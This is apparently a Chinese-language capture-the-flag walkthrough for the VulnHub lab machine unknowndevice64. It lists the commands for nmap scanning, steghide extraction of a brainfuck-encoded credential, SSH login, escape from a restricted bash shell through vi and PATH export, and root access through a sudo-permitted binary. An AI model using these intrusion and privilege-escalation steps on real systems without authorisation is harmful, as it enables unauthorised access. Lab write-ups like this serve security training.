一、靶机信息收集
1、靶机下载地址
https://download.vulnhub.com/unknowndevice64/unknowndevice64-V1.0.ova
2、扫描靶机IP
nmap 192.168.31.0/24
3、探测靶机主机、端口、服务信息
nmap -sS -sV -A -p- 192.168.31.154
二、web渗透测试
1、访问http开启端口
没什么发现
f12查看源码,发现有一个图片 key_is_h1dd3n.jpg
2、访问图片,上面写着 隐藏的秘密
将图片下载下来,在kali中使用 steghide 工具提取信息
需要输入密码,根据图片名字知道密码为h1dd3n
得到一个好h1dd3n.txt文本
3、查看文件内容,是 brainfuck 加密
4、解密
ud64:1M!#64@ud
5、登录ssh
ssh ud64@192.168.31.154 -p 1337
三、提权
1、发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令
使用vi 绕过,还是有部分命令无法执行
vi
shift 加 :
!/bin/bash
2、export 配置环境变量绕过
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
3、查看当前权限
发现sysud64可以执行所有权限
sysud64 -h 查看帮助
可以使用
-o file send trace output to FILE instead of stderr
4、尝试提权,提权成功
sudo sysud64 -o /dev/null /bin/bash
提权成功!!!